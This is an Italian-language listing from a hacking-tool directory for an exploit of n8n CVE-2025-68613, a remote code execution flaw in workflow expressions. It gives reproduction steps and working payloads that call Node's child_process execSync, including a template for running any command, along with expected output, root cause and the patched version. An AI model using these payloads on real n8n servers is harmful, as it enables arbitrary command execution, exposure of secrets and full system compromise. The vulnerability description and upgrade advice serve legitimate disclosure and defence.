Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
n8n-CVE-2025-68613-exploit — CVE-2025-68613: exploit e documentazione della vulnerabilità RCE in n8n | Kitploit
Strumenti/GitHubGitHub/wioui/n8n-cve-2025-68613-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubwioui/n8n-cve-2025-68613-exploit

n8n-CVE-2025-68613-exploit

CVE-2025-68613: exploit e documentazione della vulnerabilità RCE in n8n

Vedi Repository
1062228 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

n8n - CVE-2025-68613: Controllo Improprio delle Risorse di Codice Gestite Dinamicamente

Vulnerabilità

n8n contiene una vulnerabilità critica di Esecuzione di Codice Arbitrario nel suo sistema di valutazione delle espressioni dei flussi di lavoro. In determinate condizioni, le espressioni fornite da utenti autenticati durante la configurazione del flusso di lavoro possono essere valutate in un contesto di esecuzione non sufficientemente isolato dal runtime sottostante.

Versioni Affette

  • Vulnerabile: n8n < v1.122.0
  • Corretto: n8n >= v1.122.0

Requisiti

  • Accesso autenticato all'istanza n8n
  • Capacità di creare/modificare flussi di lavoro

Passaggi per Riprodurre

1. Creare un Nuovo Flusso di Lavoro

  • Fare clic su "Aggiungi flusso di lavoro"

2. Aggiungere Nodi

  • Aggiungere il nodo "Trigger Manuale"
  • Aggiungere il nodo "Imposta" (collegato al trigger)

3. Configurare il Payload

  • Fare clic sul nodo Set
  • Fare clic su "Aggiungi Valore" → Selezionare "Stringa"
  • Assegnare al campo il nome "result"
  • Fare clic sull'icona "=" per abilitare la modalità espressione

4. Iniettare il Payload

Incollare questo payload nel campo espressione:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

5. Eseguire

  • Fare clic su "Esegui passo"
  • Controllare l'output del nodo Set per il risultato del comando

Dimostrazione Exploit CVE-2025-68613

Esempi di Payload

Comando ID:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

Comando PWD:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}

Template Comando Personalizzato:

root@kitploit:~
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}

Output Previsto

Per il comando id:

root@kitploit:~
uid=1000(node) gid=1000(node) groups=1000(node)

Per il comando pwd:

root@kitploit:~
/app

Causa Principale

Il valutatore di espressioni non ha un sanitizzatore per impedire alle espressioni di funzione di accedere a this.process (oggetto process di Node.js), consentendo l'accesso ai moduli di sistema.

Impatto

  • Esecuzione di comandi arbitrari
  • Accesso al filesystem
  • Esposizione di variabili d'ambiente
  • Compromissione completa del sistema

Mitigazione

Effettuare l'upgrade a n8n v1.122.0 o successivo.

Riferimenti

  • Correzione: https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79
  • Repository: https://github.com/n8n-io/n8n
  • Post del blog : https://blog.ogwilliam.com/post/n8n-rce-vulnerability-cve-2025-68613

Avvertenza: Queste informazioni sono fornite solo a scopo di sandbox e didattico. L'uso non autorizzato di queste informazioni per sfruttare i sistemi è illegale e non etico. Ottenere sempre la debita autorizzazione prima di testare o sfruttare vulnerabilità.

Scarica lo strumento